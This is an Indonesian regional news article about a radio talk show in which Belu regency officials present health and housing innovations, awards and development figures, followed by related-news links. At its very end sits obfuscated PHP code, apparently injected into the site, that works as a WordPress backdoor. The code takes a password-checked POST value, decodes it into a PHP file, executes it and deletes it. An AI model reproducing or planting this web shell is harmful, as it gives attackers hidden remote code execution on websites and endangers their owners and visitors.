Inovasi Hebat, Masyarakat Belu yang Sehat, Berkarakter dan Kompetitif

Rabu, 28 Februari 2024 - 07:37 WITA

facebook twitter whatsapp telegram line copy

URL berhasil dicopy

facebook icon twitter icon whatsapp icon telegram icon line icon copy

URL berhasil dicopy

Belu – Suarafaktahukum.com
Biro Administrasi Pimpinan Setda Provinsi NTT berkerjasama dengan Lembaga Penyiaran Publik (LPP) Radio Republik Indonesia (RRI) Atambua melaksanakan Talk Show Radio dengan tema “Inovasi Hebat, Masyarakat Belu yang Sehat, Berkarakter dan Kompetitif”, pada Kamis (22/02/2024). Talk Show Radio ini disiarkan secara langsung melalui LPP RRI Atambua 91.05 MHz dan _live streaming_ Facebook LPP RRI Atambua.

Adapun kegiatan ini menghadirkan tiga orang narasumber yakni, Bupati Belu, dr. Agustinus Taolin, Sp. PD- KGEH., FINASIM, Kepala Dinas Kesehatan Kabupaten Belu, drg. Ansilla F. Eka Mutty dan Kepala Dinas PUPR Kabupaten Belu, Vinsensius Dalung, ST.

Bupati Belu, dr. Agustinus Taolin, Sp. PD- KGEH., FINASIM mengungkapkan dalam rangka mewujudkan masyarakat Belu yang Sehat dan Berkarakter Kompetitif, Pemerintah Belu terus memberikan Inovasi – inovasi yang berdampak bagi masyarakat. Inovasi- inovasi ini kemudian telah mengantarkan Kabupaten Belu menorehkan prestasi dengan meraih penghargaan Kabupaten Terinovatif se-Indonesia Kategori Daerah Tertinggal dan Daerah Perbatasan Terinovatif dalam ajang _Innovative Government Award_ (IGA) pada Selasa (12/12/2023) lalu.

“Dua Inovasi bidang kesehatan yakni Cakupan Kesehatan Semesta Belu (Cakes Belu) yang dapat diakses seluruh masyarakat Belu yang berkerjasama dengan BPJS seluruh Indonesia dan inovasi di bidang perumahan yakni Optimalisasi Pengelolaan Data Base Rumah Tidak Layak Huni berbasis aplikasi (Sipenata RTLH) ini merupakan suatu aplikasi yang mampu memberikan informasi akurat terkait rumah tidak layak huni termasuk titik koordinat akurat, _by name by adress_ di seluruh Kabupaten Belu. Dengan adanya informasi akurat ini, program perbaikan rumah tidak layak huni menjadi tepat sasaran,” Jelas Agustinus.

Lebih lanjut, Bupati Agustinus menyampaikan selain inovasi juga terus dilaksanakan kajian dan evaluasi secara berjenjang sebagai mata rantai kegiatan yang wajb dilaksanakan untuk mencapai keberhasilan inovasi-inovasi tersebut.

Menurut Kepala Dinas Kesehatan, drg. Ansilla F. Eka Mutty, inovasi di bidang kesehatan ini awalnya merupakan ide utama dari Bupati Agustinus dan Dinas Kesehatan Kabupaten Belu sebagai penyelenggara merealisasikan inovasi ini melalui peraturan dan hal-hal teknis di lapangan.

“Selain pelayanan kesehatan menggunakan E-KTP bagi seluruh masyarakat Kabupaten Belu, kami juga berusaha terus meningkatkan kualitas pelayanan kesehatan dan kini sudah terbukti Kabupaten Belu dalam pelayanan endoskopi yang membawa Kabupaten ini memperoleh penghargaan pelopor endoskopi di NTT. Saat ini kami mempersiapkan dua perawat dan satu orang dokter spesialis penyakit dalam yang sedang mengikuti pelatihan endoskopi dan akan melanjutkan pendidikan mereka,” Jelas Ansilla.

Lebih lanjut, Ansilla mengungkapkan kedepan Kabupaten Belu akan menjadi pusat KJSU (penyakit Kanker, Jantung, Strok, dan Uronefrologi/penyakit ginjal), laboratorium kesehatan dan telah memiliki dua mesin produksi oksigen hibah KADIN dan Kementerian Kesehatan RI guna mendukung kualitas pelayanan bagi masyarakat.

Sedangkan, terkait aplikasi Sipenata RTLH Kadis PUPR Kabupaten Belu, Vinsensius Dalung, ST mengatakan sebelumnya pendataan RTLH secara dilakukan secara manual pada 12 kecamatan, tetapi berkat aplikasi tersebut masyarakat sudah mampu menginput data secara maandiri melalui aplikasi ini tanpa survei sehingga mempermudah pendataan RTLH.

“Secara umum masih banyak RTRH kurang lebih 35,30 persen. Memang terdapat keterbasan anggaran dalam pelaksanaan program pembangunan rumah layak huni. Sedangkan aplikasi Sipenata RTLH dapat diakses melalui Playstore dari aplikasi ini kemudian dapat dibuat peta persebaran RTLH di Kabupaten Belu, memang kendalanya masyarakat belum paham cara penginputan data sehingga kami terus melaksanakan sosialisasi melalui media sosial dan berkoordinasi dengan petugas pelayanan di tingkat Desa,” Ungkap Vinsesius.

Kepala BP4D Kabupaten Belu, Rene Bere Baria, ST yang turut hadir dalam kegiatan Talk Show tersebut mengatakan, berdasarkan data BPS capaian indeks pembangunan manusia di Kabupaten Belu pada akhir tahun 2023 mengalami peningkatan sebesar 67,5 persen dari target 63,67 persen dengan sumbangan terbesar dari sektor kesehatan karena angka harapan hidup yang meningkat dari sebelumnya 66 tahun menjadi 67 tahun.

Menurut Bupati Agustinus selain meningkatnya angka harapan hidup di Kabupaten Belu, hal ini juga disertai penurunan angka kematian Ibu dan bayi serta penurunan angka stunting.

“Semua pencapaian ini didukung ketersediaan petugas dan fasilitas kesehatan di Puskesmas dan Rumah Sakit. Tahun ini Puji Tuhan, Kabupaten Belu yang sudah eradikasi kasus malaria dan akreditasi bintang 5 untuk rumah sakit di Kabupaten ini,” Katanya.

Tisera Antonius sebagai perwakilan tokoh masyarakat Kabupaten Belu menyampaikan terima kasih dan apresiasi kepada Bupati dan Pemerintah Belu atas berbagai inovasi yang mendukung kebutuhan masyarakat Belu, baik dibidang kesehatan maupun bidang perumahan.

“Tidak sebatas penilaian dan penghargaan, ini juga menjadi tantangan bagi Dinas Kesehatan Kabupaten Belu dan Dinas PUPR Kabupaten Belu agar kiranya segala pencapaian selain dipertahankan juga terus ditingkatkan agar setiap program yang dilaksanakan bisa berlanjut juga dituntut inovasi dan kompetensi dari ASN. Terima kasih juga kami sampaikan kepada RRI Atambua sebagai media penyebaran informasi kegiatan Pemerintah Kabupaten Belu,” Jelasnya.(sfh)

 

 

Berita Terkait

Danrem 161/Wira Sakti pimpin Acara Sertijab dan Laporan Tradisi Korps Kasi Log Kasrem 161/Wira Sakti
Pj. Gubernur NTT Gelar Jamuan Makan Malam Bersama Duta Besar Vatikan untuk Indonesia, Para Kardinal dan Para Uskup Se-Indonesia dan Timor Leste
Lantik Penjabat Bupati Kupang dan Ende, Ayodhia Kalake Minta Berikan Pengabdian dan Pelayanan yang Tulus
Penjabat Gubernur Ayodhia Kalake Lantik dan Kukuhkan 27 Pejabat Pimpinan Tinggi Pratama Lingkup Pemprov NTT
Penjabat Gubernur Launching Alat Kesehatan Kateterisasi Jantung di RSUD. Prof. Dr. W. Z. Johannes Kupang
Penjabat Gubernur Buka Kegiatan Bakti Sosial Operasi Katarak dan Penghijauan di Lingkungan RSUP dr.Ben Mboi
Anggota TNI Mendapat Penyuluhan Hukum di Makorem 161/Wira Sakti
Danrem 161/WS Pimpin Ziarah Dalam Rangka HUT Korem 161/WS ke-63 di TMP Dharma Loka Kota Kupang

Berita Terkait

Minggu, 3 September 2023 - 11:57 WITA

GUBERNUR NTT DAN WAKIL MENGUCAPKAN HUT RI KE-78

Rabu, 21 Desember 2022 - 09:38 WITA

UCAPAN SELAMAT HARI RAYA NATAL DAN TAHUN BARU

Rabu, 21 Desember 2022 - 09:32 WITA

UCAPAN SELAMAT HARI RAYA NATAL DAN TAHUN BARU

Minggu, 16 Oktober 2022 - 09:58 WITA

Pertemuan Delegasi Indonesia dengan Pemerintah Timor-Leste terkait Zona Perdagangan Bebas

Minggu, 2 Oktober 2022 - 12:43 WITA

PENPROV NTT MENGUCAPKAN TURUT BERDUKA CITA

Jumat, 19 Agustus 2022 - 12:37 WITA

DIRGAHAYU REPUBLIK INDONESIA KE 77 17 AGUSTUS 2022

Rabu, 6 Juli 2022 - 17:24 WITA

Mayjen TNI Sonny ; Manfaatkan Lahan Kosong Untuk Tanam Marungga

Selasa, 24 Mei 2022 - 17:12 WITA

IKLAN ULANG TAHUN SEKDA NTT

Berita Terbaru

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}